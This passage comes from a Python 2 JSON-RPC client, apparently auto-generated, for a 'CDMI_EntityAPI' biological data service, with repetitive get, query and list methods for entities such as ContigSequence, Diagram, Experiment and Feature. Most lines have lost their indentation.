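        """Return the requested fields for ContigSequence entities matching qry."""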
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ContigSequence',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ContigSequence(self, start, count, fields):
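        """Return the requested fields for count ContigSequence entities from offset start."""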
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ContigSequence',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_CoregulatedSet(self, ids, fields):
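        """Return the requested fields for each CoregulatedSet entity named in ids."""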
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_CoregulatedSet',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_CoregulatedSet(self, qry, fields):
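        """Return the requested fields for CoregulatedSet entities matching qry."""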
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_CoregulatedSet',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_CoregulatedSet(self, start, count, fields):
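        """Return the requested fields for count CoregulatedSet entities from offset start."""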
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_CoregulatedSet',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Diagram(self, ids, fields):
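        """Return the requested fields for each Diagram entity named in ids."""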
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Diagram',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Diagram(self, qry, fields):
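        """Return the requested fields for Diagram entities matching qry."""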
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Diagram',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Diagram(self, start, count, fields):
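        """Return the requested fields for count Diagram entities from offset start."""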
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Diagram',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_EcNumber(self, ids, fields):
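        """Return the requested fields for each EcNumber entity named in ids."""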
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_EcNumber',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_EcNumber(self, qry, fields):
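        """Return the requested fields for EcNumber entities matching qry."""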
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_EcNumber',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_EcNumber(self, start, count, fields):
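        """Return the requested fields for count EcNumber entities from offset start."""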
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_EcNumber',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Effector(self, ids, fields):
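        """Return the requested fields for each Effector entity named in ids."""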
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Effector',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Effector(self, qry, fields):
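        """Return the requested fields for Effector entities matching qry."""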
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Effector',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Effector(self, start, count, fields):
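        """Return the requested fields for count Effector entities from offset start."""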
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Effector',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Environment(self, ids, fields):
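        """Return the requested fields for each Environment entity named in ids."""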
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Environment',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Environment(self, qry, fields):
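        """Return the requested fields for Environment entities matching qry."""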
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Environment',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Environment(self, start, count, fields):
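        """Return the requested fields for count Environment entities from offset start."""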
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Environment',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Experiment(self, ids, fields):
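        """Return the requested fields for each Experiment entity named in ids."""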
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Experiment',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Experiment(self, qry, fields):
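        """Return the requested fields for Experiment entities matching qry."""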
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Experiment',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Experiment(self, start, count, fields):
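        """Return the requested fields for count Experiment entities from offset start."""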
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Experiment',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ExperimentMeta(self, ids, fields):
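        """Return the requested fields for each ExperimentMeta entity named in ids."""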
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ExperimentMeta',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ExperimentMeta(self, qry, fields):
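        """Return the requested fields for ExperimentMeta entities matching qry."""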
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ExperimentMeta',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ExperimentMeta(self, start, count, fields):
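        """Return the requested fields for count ExperimentMeta entities from offset start."""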
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ExperimentMeta',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ExperimentalUnit(self, ids, fields):
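        """Return the requested fields for each ExperimentalUnit entity named in ids."""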
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ExperimentalUnit',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ExperimentalUnit(self, qry, fields):
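        """Return the requested fields for ExperimentalUnit entities matching qry."""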
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ExperimentalUnit',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ExperimentalUnit(self, start, count, fields):
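        """Return the requested fields for count ExperimentalUnit entities from offset start."""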
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ExperimentalUnit',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ExperimentalUnitGroup(self, ids, fields):
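        """Return the requested fields for each ExperimentalUnitGroup entity named in ids."""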
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ExperimentalUnitGroup',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ExperimentalUnitGroup(self, qry, fields):
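        """Return the requested fields for ExperimentalUnitGroup entities matching qry."""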
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ExperimentalUnitGroup',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ExperimentalUnitGroup(self, start, count, fields):
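        """Return the requested fields for count ExperimentalUnitGroup entities from offset start."""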
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ExperimentalUnitGroup',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Family(self, ids, fields):
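        """Return the requested fields for each Family entity named in ids."""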
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Family',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Family(self, qry, fields):
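        """Return the requested fields for Family entities matching qry."""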
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Family',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Family(self, start, count, fields):
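        """Return the requested fields for count Family entities from offset start."""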
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Family',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Feature(self, ids, fields):
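        """Return the requested fields for each Feature entity named in ids."""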
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Feature',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Feature(self, qry, fields):
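        """Return the requested fields for Feature entities matching qry."""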
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Feature',
'params': [qry, fields],
